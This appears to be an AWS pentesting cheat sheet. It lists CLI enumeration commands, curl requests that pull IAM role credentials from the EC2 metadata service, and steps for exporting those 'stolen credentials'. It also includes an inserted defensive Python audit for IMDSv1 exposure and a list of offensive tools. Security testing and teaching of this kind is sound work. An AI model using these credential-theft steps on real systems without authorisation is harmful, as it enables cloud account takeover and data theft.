AWS Pentesting
AWS environments are often compromised through misconfigured IAM permissions, exposed S3 buckets, and Server-Side Request Forgery (SSRF) attacks targeting the Instance Metadata Service (IMDS).
Initial Access & Enumeration
AWS CLI Configuration.
aws configure
# Enter Access Key ID, Secret Access Key, Region
Check current identity.
aws sts get-caller-identity
Enumerate IAM users and roles.
aws iam list-users
aws iam list-roles
aws iam list-groups
Get user details.
aws iam get-user --user-name target-user
aws iam list-attached-user-policies --user-name target-user
aws iam list-user-policies --user-name target-user
Enumerate S3 buckets.
aws s3 ls
aws s3 ls s3://bucket-name --recursive
Check for public buckets (unauthenticated).
curl https://bucket-name.s3.amazonaws.com/
aws s3 ls s3://bucket-name --no-sign-request
EC2 enumeration.
aws ec2 describe-instances
aws ec2 describe-security-groups
aws ec2 describe-vpcs
Lambda functions.
aws lambda list-functions
aws lambda get-function --function-name target-function
Secrets Manager.
aws secretsmanager list-secrets
aws secretsmanager get-secret-value --secret-id secret-name
Metadata Service Exploitation
EC2 Instance Metadata Service (IMDS) v1 - reachable with a plain GET, so it is exploitable via SSRF.
Get instance identity.
curl http://169.254.169.254/latest/meta-data/
Get IAM role credentials.
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE-NAME
Response contains AccessKeyId, SecretAccessKey, Token.
# Response format:
# {
#   "Code" : "Success",
#   "LastUpdated" : "...",
#   "Type" : "AWS-HMAC",
#   "AccessKeyId" : "ASIA...",
#   "SecretAccessKey" : "...",
#   "Token" : "...",
#   "Expiration" : "..."
# }
Use stolen credentials.
export AWS_ACCESS_KEY_ID="ASIAXXX"
export AWS_SECRET_ACCESS_KEY="xxx"
export AWS_SESSION_TOKEN="xxx"
IMDSv2 (requires a session token obtained with a PUT request first).
TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/
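Added example (not from this page or any tool it lists): a defender-side audit for the IMDSv1 exposure described above. It parses the JSON shape of `aws ec2 describe-instances --output json` and lists instances whose metadata endpoint still answers token-less requests, together with the `aws ec2 modify-instance-metadata-options` command that enforces IMDSv2. The instance ids, account number and profile ARNs are constructed sample values.

```python
"""Audit EC2 metadata options for IMDSv1 exposure.

Input is the JSON produced by `aws ec2 describe-instances --output json`;
a constructed sample is embedded below so the script runs offline.
"""
import json

# Constructed sample (ids, account and ARNs are made up) in the shape of
# `aws ec2 describe-instances --output json`.
SAMPLE_DESCRIBE_INSTANCES = json.dumps({"Reservations": [{"Instances": [
    {"InstanceId": "i-0aaa111aaa111aaa1",
     "IamInstanceProfile": {"Arn": "arn:aws:iam::123456789012:instance-profile/web-role"},
     "MetadataOptions": {"HttpEndpoint": "enabled", "HttpTokens": "optional",
                         "HttpPutResponseHopLimit": 2}},
    {"InstanceId": "i-0bbb222bbb222bbb2",
     "MetadataOptions": {"HttpEndpoint": "enabled", "HttpTokens": "required",
                         "HttpPutResponseHopLimit": 1}},
    {"InstanceId": "i-0ccc333ccc333ccc3",
     "IamInstanceProfile": {"Arn": "arn:aws:iam::123456789012:instance-profile/batch-role"},
     "MetadataOptions": {"HttpEndpoint": "disabled", "HttpTokens": "optional",
                         "HttpPutResponseHopLimit": 1}},
]}]})


def find_imdsv1_exposed(describe_json: str) -> list[dict]:
    """Return one finding per instance that still serves token-less (IMDSv1) requests."""
    findings = []
    for reservation in json.loads(describe_json).get("Reservations", []):
        for inst in reservation.get("Instances", []):
            opts = inst.get("MetadataOptions", {})
            if opts.get("HttpEndpoint") != "enabled":
                continue  # endpoint off: neither v1 nor v2 is reachable
            if opts.get("HttpTokens") == "required":
                continue  # IMDSv2 enforced: every request needs the PUT-obtained token
            findings.append({
                "InstanceId": inst["InstanceId"],
                # Role credentials are only on offer when an instance profile is attached.
                "RoleCredentialsReachable": "IamInstanceProfile" in inst,
                "HopLimit": opts.get("HttpPutResponseHopLimit"),
                "Remediation": ("aws ec2 modify-instance-metadata-options "
                                f"--instance-id {inst['InstanceId']} --http-tokens required"),
            })
    return findings


if __name__ == "__main__":
    for finding in find_imdsv1_exposed(SAMPLE_DESCRIBE_INSTANCES):
        print(json.dumps(finding))
```

Only the first sample instance is reported: the second already enforces IMDSv2 and the third has the metadata endpoint disabled entirely.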
AWS Tools
Pacu (Exploitation)
The AWS exploitation framework. Designed for testing the security of Amazon Web Services environments.
Installation
pip3 install pacu
enumerate-iam (Enumeration)
Brute-force enumeration of AWS IAM permissions.
Installation
pip install enumerate-iam
S3Scanner (Scanning)
Scan for open S3 buckets and dump the contents.
Installation
pip install s3scanner
CloudMapper (Visualization)
Analyze your AWS environment. Helps you create network diagrams and audit security.
Installation
pip install cloudmapper